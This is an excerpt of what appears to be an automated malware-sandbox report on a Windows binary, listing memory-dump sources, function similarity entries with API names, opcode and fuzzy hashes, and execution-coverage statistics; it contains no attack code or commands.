                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 4a7da8aed5b6b79ac28b560fab634060b8de61e66efdea0db68f532d6a9d005f
                                                                • Instruction ID: aed0cf8f8b7d386964fb65a6558d4d740e93fdcd1e13a7cababd9f460bafa725
                                                                • Opcode Fuzzy Hash: 4a7da8aed5b6b79ac28b560fab634060b8de61e66efdea0db68f532d6a9d005f
                                                                • Instruction Fuzzy Hash: E1317C25A0AA4281FB05EF56E5401B86761EF86FA5F080532DA4DC76A9DF7CFC4AC320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 08f660a80a6bd6db7d3452848060bf96eabaf76c459d8e3d31bb2cc7a43d8b64
                                                                • Instruction ID: 823b7bbf536027184d801746c159595cb459c7467425a432af3af6d4972b8682
                                                                • Opcode Fuzzy Hash: 08f660a80a6bd6db7d3452848060bf96eabaf76c459d8e3d31bb2cc7a43d8b64
                                                                • Instruction Fuzzy Hash: F5314F26A0AA4295FF05EF55E4401B967A1FF46FA4F080536DA0D876EADE7CEC42C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 175a4327bf2b3b06f3d95371e1b0a11bdbe8cfea884c63090f2e2448b9f805a8
                                                                • Instruction ID: 66338913482d6f13b6e5bf8f5a6ec9c26be49f1d0976c34cf31de2913b61c857
                                                                • Opcode Fuzzy Hash: 175a4327bf2b3b06f3d95371e1b0a11bdbe8cfea884c63090f2e2448b9f805a8
                                                                • Instruction Fuzzy Hash: 5F318D25A0AA4281FA15EF56E5405B86761FF87FA1F090132DA0DC76A6DF7CFC86C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 1566fae3d0445a6c441ba320261657d37fc91eae55285bf6e743efda64440272
                                                                • Instruction ID: 2d349990ff90ed3106c471e596fcdc9fde85d3626037453ac6fecf6b378d8eb0
                                                                • Opcode Fuzzy Hash: 1566fae3d0445a6c441ba320261657d37fc91eae55285bf6e743efda64440272
                                                                • Instruction Fuzzy Hash: E5315236A1AA4295FF15EF95E4401B967A1EF46FA0F180132DA1DC7696DF7CEC82C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 8e1c69f7fe255bc03789d27f0fc7e714bcf807a62433ab12183457e2a661c027
                                                                • Instruction ID: 21b149e78b7e62d4d38c10ac45e2288778126d3dc0797c38aa8aea47bc6e99ba
                                                                • Opcode Fuzzy Hash: 8e1c69f7fe255bc03789d27f0fc7e714bcf807a62433ab12183457e2a661c027
                                                                • Instruction Fuzzy Hash: FB313E29E0AA4281EA05EF55E8441BD6761FF96FA0F480131DA0DC76A5EF7CFC46C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 36efe169a6ebd8aef92053f11cca52ea8b32167d8c389a821dd7b65474c87744
                                                                • Instruction ID: be278c6296937af47b73831788cbf1679dceb130ae6d208c201f6d756ec4a7ab
                                                                • Opcode Fuzzy Hash: 36efe169a6ebd8aef92053f11cca52ea8b32167d8c389a821dd7b65474c87744
                                                                • Instruction Fuzzy Hash: 00316626A1AA4281FA15EF56E4401BD6751FF96FA1F080131DA0DC7696DF7CFC46C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 2117a84d37158296eec2bd850f87667277ffb73284195d52f6e2d41b2ff2937d
                                                                • Instruction ID: 90f3f0f51b5e10b13ae132947c18304d72a6bbcca4c159da2eaf98dff5711e87
                                                                • Opcode Fuzzy Hash: 2117a84d37158296eec2bd850f87667277ffb73284195d52f6e2d41b2ff2937d
                                                                • Instruction Fuzzy Hash: 24315426A0AA4291EB05EF55D4402BD6791FF46FA4F080532DA4DC77D5DE7CEC42C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 2732deb32a6e35dd6a2eb56c6452a49076469c3353fd504ed171353e37f136bc
                                                                • Instruction ID: 7df8a3a50c36ca0ddf9be9978908fcee55ec938b19ed96f69e6d6d85e859ea08
                                                                • Opcode Fuzzy Hash: 2732deb32a6e35dd6a2eb56c6452a49076469c3353fd504ed171353e37f136bc
                                                                • Instruction Fuzzy Hash: 37318027A0AA5291FF05EF55E4441B867A1FF86FA4F580132DA0DC76A5DE7CEC82C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 1239f9da964960b2540dbdd5ceb4f6c1a467ff7cef015842ba34e5ed629177e8
                                                                • Instruction ID: f24058a5b9bc64addf16ac29aa7cb643afda76a650a0453b90b704aa0ddc67ef
                                                                • Opcode Fuzzy Hash: 1239f9da964960b2540dbdd5ceb4f6c1a467ff7cef015842ba34e5ed629177e8
                                                                • Instruction Fuzzy Hash: 7B317C26A0AA4291FF05EF65E4401B867A1FF87FA0F184132DA4D877A5DE7CEC42C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 210c631a9135c7773bfa571deb22057c837beb874036450f135bcf1ac10e1455
                                                                • Instruction ID: d39718dea488f81b4e2468f3f44f495e89ff20ea883251d09a841d945f9fe10f
                                                                • Opcode Fuzzy Hash: 210c631a9135c7773bfa571deb22057c837beb874036450f135bcf1ac10e1455
                                                                • Instruction Fuzzy Hash: 9B31A035A0AA4284EA05EF56E5001B96761FF86FA0F090132DA0DC77A5DF7CFC46C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 442e0f71d7932d6e919f2b95302216f9b2e169bd45c5a1af0ab64b4b2f9f99a7
                                                                • Instruction ID: e5763956ab1726e45d0f04b9a98bfa78fa083e16aefa0f312d57d964e7d50a52
                                                                • Opcode Fuzzy Hash: 442e0f71d7932d6e919f2b95302216f9b2e169bd45c5a1af0ab64b4b2f9f99a7
                                                                • Instruction Fuzzy Hash: B1315A39A0AA4281EA16EF55E5401B96761FF86FA1F090132DA0DC77A6DF7CFD46C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 8fff2511940910620396665920ee95fa34a5df8c9eaa3d3847896387a02590da
                                                                • Instruction ID: 47c4f5e32a45deb27bd76a20eaddfff0cc00b1e0f08d0f1fc773eedde46cb225
                                                                • Opcode Fuzzy Hash: 8fff2511940910620396665920ee95fa34a5df8c9eaa3d3847896387a02590da
                                                                • Instruction Fuzzy Hash: 1B316126A1AA5295FF15EF55E4401BD67A1EF46FA0F180132DA0DC76A6DF7CEC82C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                Similarity
                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                • String ID:
                                                                • API String ID: 2933794660-0
                                                                Similarity
                                                                • API ID: __except_validate_context_record
                                                                • String ID: csm$csm
                                                                • API String ID: 1467352782-3733052814
                                                                Similarity
                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                • String ID: ?
                                                                • API String ID: 1286766494-1684325040
                                                                Similarity
                                                                • API ID: CreateFrameInfo__except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 2558813199-1018135373
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite
                                                                • String ID: U
                                                                • API String ID: 442123175-4171548499
                                                                Similarity
                                                                • API ID: type_info::_name_internal_method
                                                                • String ID: P$https
                                                                • API String ID: 3713626258-3662734162
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: faf60231c9281e8de667494f4fdb26f10e9e1cb6ef4151b568b2444df3f7d491
                                                                • Instruction ID: 86262ec8d7b8fe2d0c7499c0a51e0fd49a8f9478403f93d5d9a4c6cb0e0d2ffd
                                                                • Opcode Fuzzy Hash: faf60231c9281e8de667494f4fdb26f10e9e1cb6ef4151b568b2444df3f7d491
                                                                • Instruction Fuzzy Hash: AB21C56260D7C585E721DB15E4503EEB7A1E79AB84F188031DACC43B8ACF3CD806CB50
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: f857a7e068703c22f70bc0f352c5e21d3c434051c1a161e5696b6eb9032e93f2
                                                                • Instruction ID: 98965c32d86e8a964a70ca76d72a69af6a6a616e082d2623c15a21949231ca1d
                                                                • Opcode Fuzzy Hash: f857a7e068703c22f70bc0f352c5e21d3c434051c1a161e5696b6eb9032e93f2
                                                                • Instruction Fuzzy Hash: 2B21D823A0D7C485E721C725E4007EEB791EB9AB84F548131EA8C47B89DF7CD846C750
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: e831e4c375957cd0e5e716f3444b2a4ed1febba7d1a1f0e2d7acaf4f82e84b1c
                                                                • Instruction ID: 9fc5094d9eaa19b54ce5233cb278ca5b1e507d942327dc1ecc7d5eb1ea2c6e4b
                                                                • Opcode Fuzzy Hash: e831e4c375957cd0e5e716f3444b2a4ed1febba7d1a1f0e2d7acaf4f82e84b1c
                                                                • Instruction Fuzzy Hash: 9321C32260D7C585E721DB19E4403EEB7A1E79AB88F588031DA8C47B8ADF3CD906C751
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf
                                                                • String ID: %$+
                                                                • API String ID: 233258989-2626897407
                                                                • Opcode ID: 46e15a95bb962e2dd417d488284b3fd0ee0fd895637bd75e109c08b0388ab4dc
                                                                • Instruction ID: 76649d6a6f8375afc5c2317a7bc293621e922e4c395e7ed0baa61350cbab886f
                                                                • Opcode Fuzzy Hash: 46e15a95bb962e2dd417d488284b3fd0ee0fd895637bd75e109c08b0388ab4dc
                                                                • Instruction Fuzzy Hash: 9221D82360E7C485E721D715E4447EEB7A1EBAAB88F588131DA8C47B89DF3CD846C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Objectshared_ptr
                                                                • String ID: 0
                                                                • API String ID: 1638491571-4108050209
                                                                • Opcode ID: f0e70b0fbdc1e3320b1f4b6d5346711075dcbb57718dc63cfcd297f1e3befe2f
                                                                • Instruction ID: 025d0a10e782524aef9c12ef56e32d8a0b55644df6d60a5e8dc149e1b3dfb3be
                                                                • Opcode Fuzzy Hash: f0e70b0fbdc1e3320b1f4b6d5346711075dcbb57718dc63cfcd297f1e3befe2f
                                                                • Instruction Fuzzy Hash: 24313A7251D6C685EB60DB10E0947AFB7A0F785B88F400136E68E87A69DF3CD944CF40
                                                                APIs
                                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6A54DDB83), ref: 00007FF6A54DE368
                                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6A54DDB83), ref: 00007FF6A54DE3A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFileHeaderRaise
                                                                • String ID: csm
                                                                • API String ID: 2573137834-1018135373
                                                                • Opcode ID: cecfb8893822065352edba2dbd42223096cc233a49940044e064f560193aab1a
                                                                • Instruction ID: 0c6fc8de3e629a3d212fc6307805b85bc755196f6456033dc09981459fd5025d
                                                                • Opcode Fuzzy Hash: cecfb8893822065352edba2dbd42223096cc233a49940044e064f560193aab1a
                                                                • Instruction Fuzzy Hash: E0115B32619B8082EB60CB15E44026977E5FB89F98F584231EE8D47754DF3CC9618B00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleHeap$FreeProcess
                                                                • String ID:
                                                                • API String ID: 4176491614-0
                                                                • Opcode ID: 4ffdf59a764e06fd56a93af4675fc0a0a6384d06bfcaaf876b97e7f445c73c96
                                                                • Instruction ID: f4f63b3b2174c6dedef56357943cf46895613d6fc78f62f315be2f905a97d72b
                                                                • Opcode Fuzzy Hash: 4ffdf59a764e06fd56a93af4675fc0a0a6384d06bfcaaf876b97e7f445c73c96
                                                                • Instruction Fuzzy Hash: 6B01FF25929B8181D694CB15E48832963B0FBCAF65F405235E66F837F4DF3CD885C700

                                                                Execution Graph

                                                                Execution Coverage:2%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:3.8%
                                                                Total number of Nodes:1663
                                                                Total number of Limit Nodes:70
